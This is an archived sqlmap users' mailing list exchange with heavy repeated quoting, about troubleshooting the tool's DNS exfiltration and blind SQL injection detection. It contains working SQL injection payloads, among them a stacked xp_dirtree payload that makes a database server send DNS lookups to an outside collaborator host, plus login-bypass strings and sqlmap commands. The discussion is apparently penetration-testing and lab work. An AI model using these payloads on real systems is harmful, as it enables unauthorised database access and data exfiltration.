16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A 173.213.231.200 (46)
16:56:16.677665 IP 8.8.8.8.53 > 97.87.91.210.47713: 384 0/1/0 (117)
16:56:16.688473 IP 97.87.91.210.60615 > 8.8.8.8.53: 55855+ A? www.testsite.org. (30)
16:56:16.688496 IP 97.87.91.210.60615 > 8.8.8.8.53: 38904+ AAAA? www.testsite.org. (30)
16:56:16.730136 IP 8.8.8.8.53 > 97.87.91.210.60615: 55855 1/0/0 A 173.213.231.200 (46)
16:56:16.731688 IP 8.8.8.8.53 > 97.87.91.210.60615: 38904 0/1/0 (117)
16:56:59.067583 IP 97.87.91.210.56778 > 8.8.8.8.53: 2671+ A? www.testsite.org. (30)
16:56:59.067619 IP 97.87.91.210.56778 > 8.8.8.8.53: 15627+ AAAA? www.testsite.org. (30)
16:56:59.105567 IP 8.8.8.8.53 > 97.87.91.210.56778: 2671 1/0/0 A 173.213.231.200 (46)
16:56:59.112534 IP 8.8.8.8.53 > 97.87.91.210.56778: 15627 0/1/0 (117)
16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A? www.testsite.org. (30)
16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ AAAA? www.testsite.org. (30)
16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A 173.213.231.200 (46)
16:58:04.079921 IP 8.8.8.8.53 > 97.87.91.210.56624: 9755 0/1/0 (117)
16:59:09.078601 IP 97.87.91.210.40911 > 8.8.8.8.53: 52733+ A? www.testsite.org. (30)
16:59:09.078623 IP 97.87.91.210.40911 > 8.8.8.8.53: 63191+ AAAA? www.testsite.org. (30)
16:59:09.104935 IP 8.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A 173.213.231.200 (46)
16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117)


It doesn't seem like an injection pattern is being tried that is getting the DNS exfiltration to occur... or else I'm doing something else wrong.


Thanks,

V

________________________________
From: Miroslav Stampar <mir...@gm...>
Sent: Monday, December 19, 2016 4:10 PM
To: Mark M.
Cc: sql...@li...
Subject: Re: [sqlmap-users] Sqlmap/DNS exfil

I would suggest you to run the wireshark or similar when running the --dns-domain to properly debug what is going on. There could be really lots of problems before you fine tune it (e.g. other service running on :53).

About the "forcing" sqlmap for using dns-exfil. It will always at least try to test it at the start of a run (if other injection technique available). Also, it will prefer other "faster" techniques (ERROR and UNION) over dns-exfil. However, there is a hidden switch "--force-dns" which will force the usage of dns-exfil even if ERROR/UNION are available.

As said, the best advice I can give to you is to run the wireshark during the run and really see what is going on.

Bye

On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@ho...<mailto:vv...@ho...>> wrote:

I have a situation where Burp has detected the following DNS exfiltration injection for a query parameter in a web app:


GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net<http://orator.net>\rtf'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1


To make that a little easier to read, the injected value is:


';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'+'orator.net<http://orator.net>\rtf'; exec master.dbo.xp_dirtree @q;--


I've modified the domain and verified that I receive the DNS requests on my local DNS server (the domain which I provide to sqlmap using the --dns-domain=xxx option) when the injection is manually sent to the page.  The problem is, when I pass the request to sqlmap it's not detecting that there's an injection at all.  I've provided the OS/DBMS and --level 5, but still no dice.  I'm using sqlmap v1.0.12#stable.


Since I've gotten many other injections to work in the past, I believe that I'm using sqlmap properly (formatting my request in a file appropriately, specifying the correct parameter to test, etc.)  However, it surprised me that what appeared to be a fairly straight-forward stacked SQL injection would slip by all of sqlmap's tests. Is there a way to force sqlmap to try DNS exfiltration injections despite no other injection technique succeeding?


Thanks

V



------------------------------------------------------------------------------
Developer Access Program for Intel Xeon Phi Processors
Access to Intel Xeon Phi processor-based developer platforms.
With one year of Intel Parallel Studio XE.
Training and support from Colfax.
Order your platform today.http://sdm.link/intel
_______________________________________________
sqlmap-users mailing list
sql...@li...<mailto:sql...@li...>
https://lists.sourceforge.net/lists/listinfo/sqlmap-users




--
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] Sqlmap/DNS exfil

[Miroslav S. <mir...@gm...>]

I would suggest you to run the wireshark or similar when running the
--dns-domain to properly debug what is going on. There could be really lots
of problems before you fine tune it (e.g. other service running on :53).

About the "forcing" sqlmap for using dns-exfil. It will always at least try
to test it at the start of a run (if other injection technique available).
Also, it will prefer other "faster" techniques (ERROR and UNION) over
dns-exfil. However, there is a hidden switch "--force-dns" which will force
the usage of dns-exfil even if ERROR/UNION are available.

As said, the best advice I can give to you is to run the wireshark during
the run and really see what is going on.

Bye

On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@ho...> wrote:

> I have a situation where Burp has detected the following DNS exfiltration
> injection for a query parameter in a web app:
>
>
> GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q
> %20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9ux
> lo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.
> dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1
>
>
> To make that a little easier to read, the injected value is:
>
>
> ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9ux
> lo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree @q;--
>
>
> I've modified the domain and verified that I receive the DNS requests on
> my local DNS server (the domain which I provide to sqlmap using the
> --dns-domain=xxx option) when the injection is manually sent to the page.
> The problem is, when I pass the request to sqlmap it's not detecting that
> there's an injection at all.  I've provided the OS/DBMS and --level 5, but
> still no dice.  I'm using sqlmap v1.0.12#stable.
>
>
> Since I've gotten many other injections to work in the past, I believe
> that I'm using sqlmap properly (formatting my request in a file
> appropriately, specifying the correct parameter to test, etc.)  However, it
> surprised me that what appeared to be a fairly straight-forward stacked SQL
> injection would slip by all of sqlmap's tests. Is there a way to force
> sqlmap to try DNS exfiltration injections despite no other injection
> technique succeeding?
>
>
> Thanks
>
> V
>
>
>
>
> ------------------------------------------------------------
> ------------------
> Developer Access Program for Intel Xeon Phi Processors
> Access to Intel Xeon Phi processor-based developer platforms.
> With one year of Intel Parallel Studio XE.
> Training and support from Colfax.
> Order your platform today.http://sdm.link/intel
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] Sqlmap/DNS exfil

[Mark M. <vv...@ho...>]

I have a situation where Burp has detected the following DNS exfiltration injection for a query parameter in a web app:


GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1


To make that a little easier to read, the injected value is:


';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree @q;--


I've modified the domain and verified that I receive the DNS requests on my local DNS server (the domain which I provide to sqlmap using the --dns-domain=xxx option) when the injection is manually sent to the page.  The problem is, when I pass the request to sqlmap it's not detecting that there's an injection at all.  I've provided the OS/DBMS and --level 5, but still no dice.  I'm using sqlmap v1.0.12#stable.


Since I've gotten many other injections to work in the past, I believe that I'm using sqlmap properly (formatting my request in a file appropriately, specifying the correct parameter to test, etc.)  However, it surprised me that what appeared to be a fairly straight-forward stacked SQL injection would slip by all of sqlmap's tests. Is there a way to force sqlmap to try DNS exfiltration injections despite no other injection technique succeeding?


Thanks

V

Re: [sqlmap-users] Problem with a Login

[Daniele B. <bbi...@gm...>]

I found something: the problem is sqlmap don't know when query is true or
false. Because when it is true it's redirected to index.php, when it is
false Login.php shows an error message.

Is there a way to say "IF (you get redirected to index.php) THEN query is
true ELSE query is false" or "IF(Login.php shows a error) THEN query is
false ELSE query is true"?

I tried with no-string option but doesn't seem work.


​

2016-12-04 17:10 GMT+01:00 Daniele Bianchin <bbi...@gm...>:

> anyway...colud anyone take the source and try himself?
>
> If it can help i'm using phpv7.0 with php-mysql libraries
>
> 2016-12-04 17:00 GMT+01:00 Daniele Bianchin <bbi...@gm...>:
>
>> @Miroslav Ah ok...i don't know i tried everything...
>>
>> 2016-12-04 16:57 GMT+01:00 Miroslav Stampar <mir...@gm...>:
>>
>>> UA == User-Agent
>>>
>>> On Dec 4, 2016 16:57, "Daniele Bianchin" <bbi...@gm...> wrote:
>>>
>>>> @Miroslav. What UA does it mean?
>>>>
>>>> @Brandon tried with sqlmap -u "127.0.0.1/test/Login.php"
>>>> --data="user=lol&password=lol" --dbs --suffix="#" -v 3 --tamper=space2plus
>>>> and didn't work.
>>>>
>>>> 2016-12-04 16:50 GMT+01:00 Miroslav Stampar <mir...@gm...
>>>> >:
>>>>
>>>>> I am kind of confused. You said that it's your application, right? Why
>>>>> would your application care about UA. Also, you've sent source code which
>>>>> hasn't looked into UA
>>>>>
>>>>> Bye
>>>>>
>>>>> On Dec 4, 2016 16:47, "Daniele Bianchin" <bbi...@gm...> wrote:
>>>>>
>>>>>> Ok, i made a test with BurpSuite as Brandon said.
>>>>>> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it
>>>>>> worked.
>>>>>> The same payload with sqlmap not.
>>>>>>
>>>>>> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>>>>>>
>>>>>> the first is made manually with firefox the second with sqlmap...
>>>>>> should i change user-agent in sqlmap?
>>>>>>
>>>>>> 2016-12-04 16:29 GMT+01:00 Daniele Bianchin <bbi...@gm...>:
>>>>>>
>>>>>>> Ok, i made a test with BurpSuite as Brandon said.
>>>>>>> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it
>>>>>>> worked.
>>>>>>> The same payload with sqlmap not.
>>>>>>>
>>>>>>> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>>>>>>>
>>>>>>> the first is made manually with firefox the second with sqlmap...
>>>>>>> should i change user-agent in sqlmap?
>>>>>>>
>>>>>>> 2016-12-04 15:39 GMT+01:00 Brandon Perry <bpe...@gm...>
>>>>>>> :
>>>>>>>
>>>>>>>> You can add —proxy and make sqlmap pass all requests through
>>>>>>>> burpsuite or another proxy so you can see what the difference is between
>>>>>>>> the requests sqlmap creates and the ones you make by hand are.
>>>>>>>>
>>>>>>>>
>>>>>>>> On Dec 4, 2016, at 8:27 AM, Miroslav Stampar <
>>>>>>>> mir...@gm...> wrote:
>>>>>>>>
>>>>>>>> This is a straigthforward case. You are messing something up.
>>>>>>>>
>>>>>>>> Use username=foobar&password=foobar in POST data. Don't put
>>>>>>>> already SQLi payload anywhere. Use --level=3 --risk=3
>>>>>>>>
>>>>>>>> As said, you are doing something really really wrong here.
>>>>>>>>
>>>>>>>> Bye
>>>>>>>>
>>>>>>>> On Sun, Dec 4, 2016 at 3:06 PM, Daniele Bianchin <
>>>>>>>> bbi...@gm...> wrote:
>>>>>>>>
>>>>>>>>> Hi!
>>>>>>>>> I have an issue with sqlmap.
>>>>>>>>> I created my own fake login in order to test blind sql injection
>>>>>>>>> but everytime i make a test sqlmap says it isn't exploitable.
>>>>>>>>> I tried to add a suffix, set level to 5, set risk to 3, set
>>>>>>>>> not-string option but sqlmap still not work with it.
>>>>>>>>> The login source is: http://pastebin.com/xzKZJNB1
>>>>>>>>>
>>>>>>>>> I tried to inject some payloads manually such as ' OR 1=1#, '
>>>>>>>>> UNION ALL SELECT NULL;NULL #, etc... and they work.
>>>>>>>>> What should i do?
>>>>>>>>>
>>>>>>>>> Thanks in advance!
>>>>>>>>>
>>>>>>>>>
>>>>>>>>> Daniele.
>>>>>>>>>
>>>>>>>>> ------------------------------------------------------------
>>>>>>>>> ------------------
>>>>>>>>> Check out the vibrant tech community on one of the world's most
>>>>>>>>> engaging tech sites, SlashDot.org <http://slashdot.org>!
>>>>>>>>> http://sdm.link/slashdot
>>>>>>>>> _______________________________________________
>>>>>>>>> sqlmap-users mailing list
>>>>>>>>> sql...@li...
>>>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>>>>
>>>>>>>>>
>>>>>>>>
>>>>>>>>
>>>>>>>> --
>>>>>>>> Miroslav Stampar
>>>>>>>> http://about.me/stamparm
>>>>>>>> ------------------------------------------------------------
>>>>>>>> ------------------
>>>>>>>> Check out the vibrant tech community on one of the world's most
>>>>>>>> engaging tech sites, SlashDot.org <http://slashdot.org>!
>>>>>>>> http://sdm.link/slashdot____________________________________
>>>>>>>> ___________
>>>>>>>> sqlmap-users mailing list
>>>>>>>> sql...@li...
>>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>>>
>>>>>>>>
>>>>>>>>
>>>>>>>
>>>>>>
>>>>>> ------------------------------------------------------------
>>>>>> ------------------
>>>>>> Check out the vibrant tech community on one of the world's most
>>>>>> engaging tech sites, SlashDot.org! http://sdm.link/slashdot
>>>>>> _______________________________________________
>>>>>> sqlmap-users mailing list
>>>>>> sql...@li...
>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>
>>>>>>
>>>>
>>
>

Re: [sqlmap-users] Problem with a Login

[Daniele B. <bbi...@gm...>]

anyway...colud anyone take the source and try himself?

If it can help i'm using phpv7.0 with php-mysql libraries

2016-12-04 17:00 GMT+01:00 Daniele Bianchin <bbi...@gm...>:

> @Miroslav Ah ok...i don't know i tried everything...
>
> 2016-12-04 16:57 GMT+01:00 Miroslav Stampar <mir...@gm...>:
>
>> UA == User-Agent
>>
>> On Dec 4, 2016 16:57, "Daniele Bianchin" <bbi...@gm...> wrote:
>>
>>> @Miroslav. What UA does it mean?
>>>
>>> @Brandon tried with sqlmap -u "127.0.0.1/test/Login.php"
>>> --data="user=lol&password=lol" --dbs --suffix="#" -v 3 --tamper=space2plus
>>> and didn't work.
>>>
>>> 2016-12-04 16:50 GMT+01:00 Miroslav Stampar <mir...@gm...>
>>> :
>>>
>>>> I am kind of confused. You said that it's your application, right? Why
>>>> would your application care about UA. Also, you've sent source code which
>>>> hasn't looked into UA
>>>>
>>>> Bye
>>>>
>>>> On Dec 4, 2016 16:47, "Daniele Bianchin" <bbi...@gm...> wrote:
>>>>
>>>>> Ok, i made a test with BurpSuite as Brandon said.
>>>>> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it
>>>>> worked.
>>>>> The same payload with sqlmap not.
>>>>>
>>>>> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>>>>>
>>>>> the first is made manually with firefox the second with sqlmap...
>>>>> should i change user-agent in sqlmap?
>>>>>
>>>>> 2016-12-04 16:29 GMT+01:00 Daniele Bianchin <bbi...@gm...>:
>>>>>
>>>>>> Ok, i made a test with BurpSuite as Brandon said.
>>>>>> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it
>>>>>> worked.
>>>>>> The same payload with sqlmap not.
>>>>>>
>>>>>> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>>>>>>
>>>>>> the first is made manually with firefox the second with sqlmap...
>>>>>> should i change user-agent in sqlmap?
>>>>>>
>>>>>> 2016-12-04 15:39 GMT+01:00 Brandon Perry <bpe...@gm...>:
>>>>>>
>>>>>>> You can add —proxy and make sqlmap pass all requests through
>>>>>>> burpsuite or another proxy so you can see what the difference is between
>>>>>>> the requests sqlmap creates and the ones you make by hand are.
>>>>>>>
>>>>>>>
>>>>>>> On Dec 4, 2016, at 8:27 AM, Miroslav Stampar <
>>>>>>> mir...@gm...> wrote:
>>>>>>>
>>>>>>> This is a straigthforward case. You are messing something up.
>>>>>>>
>>>>>>> Use username=foobar&password=foobar in POST data. Don't put already
>>>>>>> SQLi payload anywhere. Use --level=3 --risk=3
>>>>>>>
>>>>>>> As said, you are doing something really really wrong here.
>>>>>>>
>>>>>>> Bye
>>>>>>>
>>>>>>> On Sun, Dec 4, 2016 at 3:06 PM, Daniele Bianchin <
>>>>>>> bbi...@gm...> wrote:
>>>>>>>
>>>>>>>> Hi!
>>>>>>>> I have an issue with sqlmap.
>>>>>>>> I created my own fake login in order to test blind sql injection
>>>>>>>> but everytime i make a test sqlmap says it isn't exploitable.
>>>>>>>> I tried to add a suffix, set level to 5, set risk to 3, set
>>>>>>>> not-string option but sqlmap still not work with it.
>>>>>>>> The login source is: http://pastebin.com/xzKZJNB1
>>>>>>>>
>>>>>>>> I tried to inject some payloads manually such as ' OR 1=1#, ' UNION
>>>>>>>> ALL SELECT NULL;NULL #, etc... and they work.
>>>>>>>> What should i do?
>>>>>>>>
>>>>>>>> Thanks in advance!
>>>>>>>>
>>>>>>>>
>>>>>>>> Daniele.
>>>>>>>>
>>>>>>>> ------------------------------------------------------------
>>>>>>>> ------------------
>>>>>>>> Check out the vibrant tech community on one of the world's most
>>>>>>>> engaging tech sites, SlashDot.org <http://slashdot.org>!
>>>>>>>> http://sdm.link/slashdot
>>>>>>>> _______________________________________________
>>>>>>>> sqlmap-users mailing list
>>>>>>>> sql...@li...
>>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>>>
>>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>> --
>>>>>>> Miroslav Stampar
>>>>>>> http://about.me/stamparm
>>>>>>> ------------------------------------------------------------
>>>>>>> ------------------
>>>>>>> Check out the vibrant tech community on one of the world's most
>>>>>>> engaging tech sites, SlashDot.org <http://slashdot.org>!
>>>>>>> http://sdm.link/slashdot____________________________________
>>>>>>> ___________
>>>>>>> sqlmap-users mailing list
>>>>>>> sql...@li...
>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>
>>>>>
>>>>> ------------------------------------------------------------
>>>>> ------------------
>>>>> Check out the vibrant tech community on one of the world's most
>>>>> engaging tech sites, SlashDot.org! http://sdm.link/slashdot
>>>>> _______________________________________________
>>>>> sqlmap-users mailing list
>>>>> sql...@li...
>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>
>>>>>
>>>
>

Re: [sqlmap-users] Problem with a Login

[Daniele B. <bbi...@gm...>]

@Miroslav Ah ok...i don't know i tried everything...

2016-12-04 16:57 GMT+01:00 Miroslav Stampar <mir...@gm...>:

> UA == User-Agent
>
> On Dec 4, 2016 16:57, "Daniele Bianchin" <bbi...@gm...> wrote:
>
>> @Miroslav. What UA does it mean?
>>
>> @Brandon tried with sqlmap -u "127.0.0.1/test/Login.php"
>> --data="user=lol&password=lol" --dbs --suffix="#" -v 3 --tamper=space2plus
>> and didn't work.
>>
>> 2016-12-04 16:50 GMT+01:00 Miroslav Stampar <mir...@gm...>:
>>
>>> I am kind of confused. You said that it's your application, right? Why
>>> would your application care about UA. Also, you've sent source code which
>>> hasn't looked into UA
>>>
>>> Bye
>>>
>>> On Dec 4, 2016 16:47, "Daniele Bianchin" <bbi...@gm...> wrote:
>>>
>>>> Ok, i made a test with BurpSuite as Brandon said.
>>>> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it
>>>> worked.
>>>> The same payload with sqlmap not.
>>>>
>>>> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>>>>
>>>> the first is made manually with firefox the second with sqlmap...
>>>> should i change user-agent in sqlmap?
>>>>
>>>> 2016-12-04 16:29 GMT+01:00 Daniele Bianchin <bbi...@gm...>:
>>>>
>>>>> Ok, i made a test with BurpSuite as Brandon said.
>>>>> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it
>>>>> worked.
>>>>> The same payload with sqlmap not.
>>>>>
>>>>> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>>>>>
>>>>> the first is made manually with firefox the second with sqlmap...
>>>>> should i change user-agent in sqlmap?
>>>>>
>>>>> 2016-12-04 15:39 GMT+01:00 Brandon Perry <bpe...@gm...>:
>>>>>
>>>>>> You can add —proxy and make sqlmap pass all requests through
>>>>>> burpsuite or another proxy so you can see what the difference is between
>>>>>> the requests sqlmap creates and the ones you make by hand are.
>>>>>>
>>>>>>
>>>>>> On Dec 4, 2016, at 8:27 AM, Miroslav Stampar <
>>>>>> mir...@gm...> wrote:
>>>>>>
>>>>>> This is a straigthforward case. You are messing something up.
>>>>>>
>>>>>> Use username=foobar&password=foobar in POST data. Don't put already
>>>>>> SQLi payload anywhere. Use --level=3 --risk=3
>>>>>>
>>>>>> As said, you are doing something really really wrong here.
>>>>>>
>>>>>> Bye
>>>>>>
>>>>>> On Sun, Dec 4, 2016 at 3:06 PM, Daniele Bianchin <
>>>>>> bbi...@gm...> wrote:
>>>>>>
>>>>>>> Hi!
>>>>>>> I have an issue with sqlmap.
>>>>>>> I created my own fake login in order to test blind sql injection but
>>>>>>> everytime i make a test sqlmap says it isn't exploitable.
>>>>>>> I tried to add a suffix, set level to 5, set risk to 3, set
>>>>>>> not-string option but sqlmap still not work with it.
>>>>>>> The login source is: http://pastebin.com/xzKZJNB1
>>>>>>>
>>>>>>> I tried to inject some payloads manually such as ' OR 1=1#, ' UNION
>>>>>>> ALL SELECT NULL;NULL #, etc... and they work.
>>>>>>> What should i do?
>>>>>>>
>>>>>>> Thanks in advance!
>>>>>>>
>>>>>>>
>>>>>>> Daniele.
>>>>>>>
>>>>>>> ------------------------------------------------------------
>>>>>>> ------------------
>>>>>>> Check out the vibrant tech community on one of the world's most
>>>>>>> engaging tech sites, SlashDot.org <http://slashdot.org>!
>>>>>>> http://sdm.link/slashdot
>>>>>>> _______________________________________________
>>>>>>> sqlmap-users mailing list
>>>>>>> sql...@li...
>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>>
>>>>>>>
>>>>>>
>>>>>>
>>>>>> --
>>>>>> Miroslav Stampar
>>>>>> http://about.me/stamparm
>>>>>> ------------------------------------------------------------
>>>>>> ------------------
>>>>>> Check out the vibrant tech community on one of the world's most
>>>>>> engaging tech sites, SlashDot.org <http://slashdot.org>!
>>>>>> http://sdm.link/slashdot____________________________________
>>>>>> ___________
>>>>>> sqlmap-users mailing list
>>>>>> sql...@li...
>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>
>>>>>>
>>>>>>
>>>>>
>>>>
>>>> ------------------------------------------------------------
>>>> ------------------
>>>> Check out the vibrant tech community on one of the world's most
>>>> engaging tech sites, SlashDot.org! http://sdm.link/slashdot
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>
>>>>
>>

Re: [sqlmap-users] Problem with a Login

[Miroslav S. <mir...@gm...>]

UA == User-Agent

On Dec 4, 2016 16:57, "Daniele Bianchin" <bbi...@gm...> wrote:

> @Miroslav. What UA does it mean?
>
> @Brandon tried with sqlmap -u "127.0.0.1/test/Login.php"
> --data="user=lol&password=lol" --dbs --suffix="#" -v 3 --tamper=space2plus
> and didn't work.
>
> 2016-12-04 16:50 GMT+01:00 Miroslav Stampar <mir...@gm...>:
>
>> I am kind of confused. You said that it's your application, right? Why
>> would your application care about UA. Also, you've sent source code which
>> hasn't looked into UA
>>
>> Bye
>>
>> On Dec 4, 2016 16:47, "Daniele Bianchin" <bbi...@gm...> wrote:
>>
>>> Ok, i made a test with BurpSuite as Brandon said.
>>> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it worked.
>>> The same payload with sqlmap not.
>>>
>>> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>>>
>>> the first is made manually with firefox the second with sqlmap...
>>> should i change user-agent in sqlmap?
>>>
>>> 2016-12-04 16:29 GMT+01:00 Daniele Bianchin <bbi...@gm...>:
>>>
>>>> Ok, i made a test with BurpSuite as Brandon said.
>>>> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it
>>>> worked.
>>>> The same payload with sqlmap not.
>>>>
>>>> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>>>>
>>>> the first is made manually with firefox the second with sqlmap...
>>>> should i change user-agent in sqlmap?
>>>>
>>>> 2016-12-04 15:39 GMT+01:00 Brandon Perry <bpe...@gm...>:
>>>>
>>>>> You can add —proxy and make sqlmap pass all requests through burpsuite
>>>>> or another proxy so you can see what the difference is between the requests
>>>>> sqlmap creates and the ones you make by hand are.
>>>>>
>>>>>
>>>>> On Dec 4, 2016, at 8:27 AM, Miroslav Stampar <
>>>>> mir...@gm...> wrote:
>>>>>
>>>>> This is a straigthforward case. You are messing something up.
>>>>>
>>>>> Use username=foobar&password=foobar in POST data. Don't put already
>>>>> SQLi payload anywhere. Use --level=3 --risk=3
>>>>>
>>>>> As said, you are doing something really really wrong here.
>>>>>
>>>>> Bye
>>>>>
>>>>> On Sun, Dec 4, 2016 at 3:06 PM, Daniele Bianchin <bbi...@gm...
>>>>> > wrote:
>>>>>
>>>>>> Hi!
>>>>>> I have an issue with sqlmap.
>>>>>> I created my own fake login in order to test blind sql injection but
>>>>>> everytime i make a test sqlmap says it isn't exploitable.
>>>>>> I tried to add a suffix, set level to 5, set risk to 3, set
>>>>>> not-string option but sqlmap still not work with it.
>>>>>> The login source is: http://pastebin.com/xzKZJNB1
>>>>>>
>>>>>> I tried to inject some payloads manually such as ' OR 1=1#, ' UNION
>>>>>> ALL SELECT NULL;NULL #, etc... and they work.
>>>>>> What should i do?
>>>>>>
>>>>>> Thanks in advance!
>>>>>>
>>>>>>
>>>>>> Daniele.
>>>>>>
>>>>>> ------------------------------------------------------------
>>>>>> ------------------
>>>>>> Check out the vibrant tech community on one of the world's most
>>>>>> engaging tech sites, SlashDot.org <http://slashdot.org>!
>>>>>> http://sdm.link/slashdot
>>>>>> _______________________________________________
>>>>>> sqlmap-users mailing list
>>>>>> sql...@li...
>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>
>>>>>>
>>>>>
>>>>>
>>>>> --
>>>>> Miroslav Stampar
>>>>> http://about.me/stamparm
>>>>> ------------------------------------------------------------
>>>>> ------------------
>>>>> Check out the vibrant tech community on one of the world's most
>>>>> engaging tech sites, SlashDot.org <http://slashdot.org>!
>>>>> http://sdm.link/slashdot____________________________________
>>>>> ___________
>>>>> sqlmap-users mailing list
>>>>> sql...@li...
>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>
>>>>>
>>>>>
>>>>
>>>
>>> ------------------------------------------------------------
>>> ------------------
>>> Check out the vibrant tech community on one of the world's most
>>> engaging tech sites, SlashDot.org! http://sdm.link/slashdot
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>

Re: [sqlmap-users] Problem with a Login

[Daniele B. <bbi...@gm...>]

@Miroslav. What UA does it mean?

@Brandon tried with sqlmap -u "127.0.0.1/test/Login.php"
--data="user=lol&password=lol" --dbs --suffix="#" -v 3 --tamper=space2plus
and didn't work.

2016-12-04 16:50 GMT+01:00 Miroslav Stampar <mir...@gm...>:

> I am kind of confused. You said that it's your application, right? Why
> would your application care about UA. Also, you've sent source code which
> hasn't looked into UA
>
> Bye
>
> On Dec 4, 2016 16:47, "Daniele Bianchin" <bbi...@gm...> wrote:
>
>> Ok, i made a test with BurpSuite as Brandon said.
>> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it worked.
>> The same payload with sqlmap not.
>>
>> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>>
>> the first is made manually with firefox the second with sqlmap...
>> should i change user-agent in sqlmap?
>>
>> 2016-12-04 16:29 GMT+01:00 Daniele Bianchin <bbi...@gm...>:
>>
>>> Ok, i made a test with BurpSuite as Brandon said.
>>> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it worked.
>>> The same payload with sqlmap not.
>>>
>>> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>>>
>>> the first is made manually with firefox the second with sqlmap...
>>> should i change user-agent in sqlmap?
>>>
>>> 2016-12-04 15:39 GMT+01:00 Brandon Perry <bpe...@gm...>:
>>>
>>>> You can add —proxy and make sqlmap pass all requests through burpsuite
>>>> or another proxy so you can see what the difference is between the requests
>>>> sqlmap creates and the ones you make by hand are.
>>>>
>>>>
>>>> On Dec 4, 2016, at 8:27 AM, Miroslav Stampar <
>>>> mir...@gm...> wrote:
>>>>
>>>> This is a straigthforward case. You are messing something up.
>>>>
>>>> Use username=foobar&password=foobar in POST data. Don't put already
>>>> SQLi payload anywhere. Use --level=3 --risk=3
>>>>
>>>> As said, you are doing something really really wrong here.
>>>>
>>>> Bye
>>>>
>>>> On Sun, Dec 4, 2016 at 3:06 PM, Daniele Bianchin <bbi...@gm...>
>>>> wrote:
>>>>
>>>>> Hi!
>>>>> I have an issue with sqlmap.
>>>>> I created my own fake login in order to test blind sql injection but
>>>>> everytime i make a test sqlmap says it isn't exploitable.
>>>>> I tried to add a suffix, set level to 5, set risk to 3, set not-string
>>>>> option but sqlmap still not work with it.
>>>>> The login source is: http://pastebin.com/xzKZJNB1
>>>>>
>>>>> I tried to inject some payloads manually such as ' OR 1=1#, ' UNION
>>>>> ALL SELECT NULL;NULL #, etc... and they work.
>>>>> What should i do?
>>>>>
>>>>> Thanks in advance!
>>>>>
>>>>>
>>>>> Daniele.
>>>>>
>>>>> ------------------------------------------------------------
>>>>> ------------------
